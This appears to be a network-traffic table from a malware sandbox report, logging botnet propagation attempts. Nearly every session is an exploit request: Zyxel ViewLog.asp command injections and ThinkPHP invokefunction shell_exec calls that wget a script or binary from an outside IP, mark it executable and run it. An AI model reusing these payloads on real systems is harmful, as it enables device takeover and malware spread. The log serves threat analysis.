                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:29.587239981 CET11010OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:30.601721048 CET11138OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:32.585393906 CET11380OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:36.777014017 CET11899OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:44.711797953 CET12880OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:00.581834078 CET14893OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:33.857414007 CET19044OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              543192.168.2.234450295.86.127.828080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:29.779200077 CET11089OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:30.903002977 CET11172OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              544192.168.2.234592888.208.31.3080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:31.027003050 CET11234OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:19:31.207643986 CET11238INHTTP/1.1 400 Bad Request
                                                              Server: nginx/1.20.1
                                                              Date: Mon, 13 Nov 2023 21:19:31 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 157
                                                              Connection: close
                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.20.1</center></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              545192.168.2.235016695.85.12.580
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:31.513349056 CET11254OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:19:31.806852102 CET11282INHTTP/1.1 400 Bad Request
                                                              Server: nginx
                                                              Date: Mon, 13 Nov 2023 21:19:31 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 150
                                                              Connection: close
                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              546192.168.2.234133095.216.191.20280
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:31.519620895 CET11254OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:19:31.828739882 CET11293INHTTP/1.1 400 Bad Request
                                                              Server: nginx
                                                              Date: Mon, 13 Nov 2023 21:19:31 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 150
                                                              Connection: close
                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              547192.168.2.233574895.101.220.6380
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:31.521239042 CET11255OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:19:31.832366943 CET11294INHTTP/1.0 400 Bad Request
                                                              Server: AkamaiGHost
                                                              Mime-Version: 1.0
                                                              Content-Type: text/html
                                                              Content-Length: 257
                                                              Expires: Mon, 13 Nov 2023 21:19:31 GMT
                                                              Date: Mon, 13 Nov 2023 21:19:31 GMT
                                                              Connection: close
                                                              Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 36 66 30 62 31 35 30 32 26 23 34 36 3b 31 36 39 39 39 31 30 33 37 31 26 23 34 36 3b 61 33 37 35 32 33 33 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                              Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;6f0b1502&#46;1699910371&#46;a375233</BODY></HTML>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              548192.168.2.234802295.255.109.25080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:31.538820982 CET11256OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:19:31.869045019 CET11295INHTTP/1.1 400 Bad Request
                                                              Content-Type: text/html; charset=us-ascii
                                                              Server: Microsoft-HTTPAPI/2.0
                                                              Date: Mon, 13 Nov 2023 21:19:32 GMT
                                                              Connection: close
                                                              Content-Length: 311
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              549192.168.2.235069095.86.119.24280
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:31.576710939 CET11257OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              55192.168.2.235637288.249.46.23980
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:17.043384075 CET2201OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:18:17.411932945 CET2213INHTTP/1.1 404 Site or Page Not Found
                                                              Nov 13, 2023 22:18:17.412354946 CET2213INData Raw: 53 65 72 76 65 72 3a 20 48 69 6b 76 69 73 69 6f 6e 2d 57 65 62 73 0d 0a 44 61 74 65 3a 20 4d 6f 6e 20 4e 6f 76 20 31 33 20 32 31 3a 34 33 3a 34 39 20 32 30 32 33 0d 0a 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 61 63 68 65 2d 43 6f
                                                              Data Ascii: Server: Hikvision-WebsDate: Mon Nov 13 21:43:49 2023Pragma: no-cacheCache-Control: no-cacheContent-Type: text/html<html><head><title>Document Error: Site or Page Not Found</title></head><body><h2>Access Error: Site or Page Not


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              550192.168.2.234655831.136.222.1138080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:32.272799969 CET11362OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:35.497009039 CET11775OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:41.640209913 CET12500OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:53.670644045 CET14037OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:19.523205042 CET17304OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:21:08.668786049 CET20704OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              551192.168.2.233549031.136.60.168080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:32.273952961 CET11362OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:35.497009039 CET11775OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:41.640237093 CET12500OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:53.670644045 CET14037OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:19.523268938 CET17305OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
